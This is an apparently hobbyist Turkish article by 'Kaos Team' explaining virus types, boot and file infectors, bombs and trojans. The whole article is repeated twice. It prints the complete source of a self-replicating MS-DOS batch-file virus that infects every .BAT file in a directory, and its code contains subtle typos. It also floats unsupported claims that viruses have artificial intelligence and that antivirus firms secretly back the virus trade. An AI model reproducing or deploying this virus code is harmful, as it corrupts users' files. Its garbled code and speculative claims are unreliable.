Virusler Hakkında Herşey
Virüs nedir diye konumuza başlıyorum sevgili bilgisayar kulanıcıları virüsler bilgisayar ortamlarına kaçak olarak giren küçük programlardırsisteme girdiklerinde coğalırlar ve tüm sistemi ele geçirirler virüsler kimilerine göre canlıdır çünkü yapay zekaları oldukları ve üreme iç güdüleri oldugundan canlı oldukları düşünülür
tabi bu tartışılır biz Kaos Team olarak bu yazıda bahsedecegiz virüslerden nasıl korunuruz veya nasıl kurtuluruz.konuya girmeden önce virüsler hakında bilgi edinelim böylece bulaşma yolarınıda
ögrenebiliriz.
herhangi bir yazılımın virüs olabilmesi için en az şu kriterleri saglaması gerklidir:
1.çalıştırılabilir olmalı
2.kendi kendilerine cogalması
3.diger çalışabilir opjeleri kendi kolanisine çevirebilmesi
Bir bilgisayar virüsü yazamk çok kolaydır aşagıda verdigimiz virüsün
kaynak kodudu (batch file virüs)nün kaynak kodudur bu yazılım ms-dos işletim sisteminin bacth file yazılmıştır
bu bir virüs yazılımıdır yalnızca virüslerin komutlarından oluşan bir yazılımı oldugunu göstermek amacıyla verilmiştir
lütfen şaka amaçlada olsa bu yazılımı kimseye uygulamayınız zaten her virüs koruma programı
tanıya bilmekte eski bir virüs yazılımıdır.
KAOS TEAM (BFV) KAYNAK KODU
echo The Batch Filr Virus (BFT.BAT)
echo Osborne/McGraw-Hill ``Computer Virıs Handbook`` kitabından
echo -Bu purogram, bilgisayar virislerinin nasıl çalıştıklarını ve
echo bir bilgisayar virisinün ne kadar kolay oldugunu
echo gostermektedir.
echo -Bulunulan dizin:
cd
echo -
echo UYARI! BU PROGRAM, BULUNULAN DİZİNDEKİ BÜTÜN .BAT DOSYALARINA
echo BULAŞIR. BULAŞTIGI .BAT DOSYALARI DİGER .BAT DOSYALARINI DA
echo ETKİLER! BU PROGRAMI ÇALIŞTIRMAKLA BÜTÜN .BAT DOSYALARINIZI
echo BOZABİLİRSİNİZ!
echo -
echo Lütfen bu programı çalıştırmadan önce bütün .BAT dosyalarınızı
echoyedekleyiniz. Eger nasıl yedekleme yapılacagını bilmiyorsanız
echo bu programı çalıştırmayın.
echo -
echo Yukardaki açıklamaları anladıysanız devam etmek için
echo herhangi bir tuşa; programdan çıkmak için ^C tuşlarına basınız.
pause > nul
cls
echo Bulunulan dizin
cd
echo Dizindeki bütün .BAT dosyalarına bulaşıyorum...
ctty nul
for % %f in (*.bat) do copy % % f + bfv.bat
ctty con
cls
echo Bu dizindeki bütün .BAT dosyalarına Batch File Virüsü
echo bulaşmıştır. Bu virüsü temizlemek için yedeklediginiz .BAT
echo dosyalarını yerlerine kopyalayınız.
Şimdi virüs çeşitlerini sıralıyacaz
Kullandıkları teknikler çok çeşitli olsa da, virüsler pratikte kabaca Dosya ve Boot virüsleri olarak ikiye ayrılırlar. Virüs deyince genelde akla ilk gelen dosya virüsleridir. Ama sık rastlanan birçok virüsün boot virüsü olduğunu da hatırlatmakta fayda var. Bir Cansu'yu, Crazy Boot'u, eskilerden Ping-Pong'u kim unutabilir ki?
Boot Virüsleri. Disketlerin ve sabit disklerin boot sektörlerine yerleşirler. Bilgisayar açıldığında veya sıfırlandığında ('reset'lendiğinde) disketin veya sabit diskin boot sektöründeki yükleyici program otomatik olarak çalıştırılır. Daha sonra işletim sistemi yüklenir ve bilgisayar normal kullanıma başlanır. Boot virüsleri, boot sektöründeki yükleme programında değişiklik yaparak kendilerini otomatikman çalıştırırlar. Böylece aktif hale gelirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler.
Dosya Virüsleri. Dosya virüsleri genelde virüs deyince akla gelen virüs türüdür. Bunlar birer asalak gibi kendilerini programın sonuna eklerler. Programın başında da değişiklik yaparak, program çalıştırıldığında ilk önce kendileri çalışırlar. RAM belleğe bir TSR gibi yerleşirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler. Genelde EXE ve COM'lara bulaşırlar. Bazılarının SYS, OVL ve BIN gibi program kodu dosyalarına bulaştığı da görülmüştür. Çoğu yalnızca çalıştırılan program dosyalarına bulaşmakla birlikte, Yandan Çarklı virüsü gibi olanları çalıştırılmayanlara da bulaşırlar.
Virüsümsüler. Virüslere benzeyen fakat virüs olmayan birçok program türü vardır. Bunların ortak özelliği bilgimiz dışında çalışmalarıdır. Örneğin bombalar; bir program yazılırken içine konur. Belli bir zamanda veya bazı şartların oluşmasına bakarak bilgisayar sistemine zarar verirler. Bombaların benzeri truva atlarıdır. Bunlar da programlara yerleştirilirler ve belli koşullar gerçekleştiğinde veya bir koşula bağlı olmaksızın daha ilk çalıştırılmada zarar verirler. Truva atları daha yaygın programlara yerleştirilirler. Ne bombalar ne de truva atları bulaşamazlar. Bu yüzden virüs değillerdir. Diğer "virüsümsüler", networklerde kullanıcı şifrelerini öğrenmek için kullanılırlar. Öğrendikleri şifreleri sahiplerine bildirirler. Bunlara bukalemun adı verilir.
turuva atı (trojan)
Özellikle güvenliği sadece kullananın becerisine kalmış kişisel
bilgisayarlara karşı kullanılan ve uzaktan erişim olanağı sağlayan
programlardır Trojanlar. Netbus ve sonrasında türeyen birçok trojan
programının kendine has birçok özelliği var. Tam anlamıyla çalıştırılan
makineyi kontrol altına alabilen trojanlardan işlevleri daha az olanlarına
kadar şu an İnternet üzerinde dolaşan birçok program var. Bunların en meşhuru
: Subseven 2.1. Artık neredeyse kendi başına bir yazılım sektörü oluşan
trojanların kendilerine göre versiyon ve güncellemeleri bile var.
Öyle ki McAffee Network Associates firması,
Subseven için "yüksek risklidir" demecini veriyor.
Aslında kısa sürede gelişen virüs ve trojan piyasasına
kimi virüs programı üreticilerinin içten içe destek verdiği paranoyasındayız.
Düşünsenize camcı, cam kırılmazsa iş yapamaz eğer onun camları indiren bir afacan oğlu yoksa.
Virüs nedir diye konumuza başlıyorum sevgili bilgisayar kulanıcıları virüsler bilgisayar ortamlarına kaçak olarak giren küçük programlardırsisteme girdiklerinde coğalırlar ve tüm sistemi ele geçirirler virüsler kimilerine göre canlıdır çünkü yapay zekaları oldukları ve üreme iç güdüleri oldugundan canlı oldukları düşünülür
tabi bu tartışılır biz Kaos Team olarak bu yazıda bahsedecegiz virüslerden nasıl korunuruz veya nasıl kurtuluruz.konuya girmeden önce virüsler hakında bilgi edinelim böylece bulaşma yolarınıda
ögrenebiliriz.
herhangi bir yazılımın virüs olabilmesi için en az şu kriterleri saglaması gerklidir:
1.çalıştırılabilir olmalı
2.kendi kendilerine cogalması
3.diger çalışabilir opjeleri kendi kolanisine çevirebilmesi
Bir bilgisayar virüsü yazamk çok kolaydır aşagıda verdigimiz virüsün
kaynak kodudu (batch file virüs)nün kaynak kodudur bu yazılım ms-dos işletim sisteminin bacth file yazılmıştır
bu bir virüs yazılımıdır yalnızca virüslerin komutlarından oluşan bir yazılımı oldugunu göstermek amacıyla verilmiştir
lütfen şaka amaçlada olsa bu yazılımı kimseye uygulamayınız zaten her virüs koruma programı
tanıya bilmekte eski bir virüs yazılımıdır.
KAOS TEAM (BFV) KAYNAK KODU
echo The Batch Filr Virus (BFT.BAT)
echo Osborne/McGraw-Hill ``Computer Virıs Handbook`` kitabından
echo -Bu purogram, bilgisayar virislerinin nasıl çalıştıklarını ve
echo bir bilgisayar virisinün ne kadar kolay oldugunu
echo gostermektedir.
echo -Bulunulan dizin:
cd
echo -
echo UYARI! BU PROGRAM, BULUNULAN DİZİNDEKİ BÜTÜN .BAT DOSYALARINA
echo BULAŞIR. BULAŞTIGI .BAT DOSYALARI DİGER .BAT DOSYALARINI DA
echo ETKİLER! BU PROGRAMI ÇALIŞTIRMAKLA BÜTÜN .BAT DOSYALARINIZI
echo BOZABİLİRSİNİZ!
echo -
echo Lütfen bu programı çalıştırmadan önce bütün .BAT dosyalarınızı
echoyedekleyiniz. Eger nasıl yedekleme yapılacagını bilmiyorsanız
echo bu programı çalıştırmayın.
echo -
echo Yukardaki açıklamaları anladıysanız devam etmek için
echo herhangi bir tuşa; programdan çıkmak için ^C tuşlarına basınız.
pause > nul
cls
echo Bulunulan dizin
cd
echo Dizindeki bütün .BAT dosyalarına bulaşıyorum...
ctty nul
for % %f in (*.bat) do copy % % f + bfv.bat
ctty con
cls
echo Bu dizindeki bütün .BAT dosyalarına Batch File Virüsü
echo bulaşmıştır. Bu virüsü temizlemek için yedeklediginiz .BAT
echo dosyalarını yerlerine kopyalayınız.
Şimdi virüs çeşitlerini sıralıyacaz
Kullandıkları teknikler çok çeşitli olsa da, virüsler pratikte kabaca Dosya ve Boot virüsleri olarak ikiye ayrılırlar. Virüs deyince genelde akla ilk gelen dosya virüsleridir. Ama sık rastlanan birçok virüsün boot virüsü olduğunu da hatırlatmakta fayda var. Bir Cansu'yu, Crazy Boot'u, eskilerden Ping-Pong'u kim unutabilir ki?
Boot Virüsleri. Disketlerin ve sabit disklerin boot sektörlerine yerleşirler. Bilgisayar açıldığında veya sıfırlandığında ('reset'lendiğinde) disketin veya sabit diskin boot sektöründeki yükleyici program otomatik olarak çalıştırılır. Daha sonra işletim sistemi yüklenir ve bilgisayar normal kullanıma başlanır. Boot virüsleri, boot sektöründeki yükleme programında değişiklik yaparak kendilerini otomatikman çalıştırırlar. Böylece aktif hale gelirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler.
Dosya Virüsleri. Dosya virüsleri genelde virüs deyince akla gelen virüs türüdür. Bunlar birer asalak gibi kendilerini programın sonuna eklerler. Programın başında da değişiklik yaparak, program çalıştırıldığında ilk önce kendileri çalışırlar. RAM belleğe bir TSR gibi yerleşirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler. Genelde EXE ve COM'lara bulaşırlar. Bazılarının SYS, OVL ve BIN gibi program kodu dosyalarına bulaştığı da görülmüştür. Çoğu yalnızca çalıştırılan program dosyalarına bulaşmakla birlikte, Yandan Çarklı virüsü gibi olanları çalıştırılmayanlara da bulaşırlar.
Virüsümsüler. Virüslere benzeyen fakat virüs olmayan birçok program türü vardır. Bunların ortak özelliği bilgimiz dışında çalışmalarıdır. Örneğin bombalar; bir program yazılırken içine konur. Belli bir zamanda veya bazı şartların oluşmasına bakarak bilgisayar sistemine zarar verirler. Bombaların benzeri truva atlarıdır. Bunlar da programlara yerleştirilirler ve belli koşullar gerçekleştiğinde veya bir koşula bağlı olmaksızın daha ilk çalıştırılmada zarar verirler. Truva atları daha yaygın programlara yerleştirilirler. Ne bombalar ne de truva atları bulaşamazlar. Bu yüzden virüs değillerdir. Diğer "virüsümsüler", networklerde kullanıcı şifrelerini öğrenmek için kullanılırlar. Öğrendikleri şifreleri sahiplerine bildirirler. Bunlara bukalemun adı verilir.
turuva atı (trojan)
Özellikle güvenliği sadece kullananın becerisine kalmış kişisel
bilgisayarlara karşı kullanılan ve uzaktan erişim olanağı sağlayan
programlardır Trojanlar. Netbus ve sonrasında türeyen birçok trojan
programının kendine has birçok özelliği var. Tam anlamıyla çalıştırılan
makineyi kontrol altına alabilen trojanlardan işlevleri daha az olanlarına
kadar şu an İnternet üzerinde dolaşan birçok program var. Bunların en meşhuru
: Subseven 2.1. Artık neredeyse kendi başına bir yazılım sektörü oluşan
trojanların kendilerine göre versiyon ve güncellemeleri bile var.
Öyle ki McAffee Network Associates firması,
Subseven için "yüksek risklidir" demecini veriyor.
Aslında kısa sürede gelişen virüs ve trojan piyasasına
kimi virüs programı üreticilerinin içten içe destek verdiği paranoyasındayız.
Düşünsenize camcı, cam kırılmazsa iş yapamaz eğer onun camları indiren bir afacan oğlu yoksa.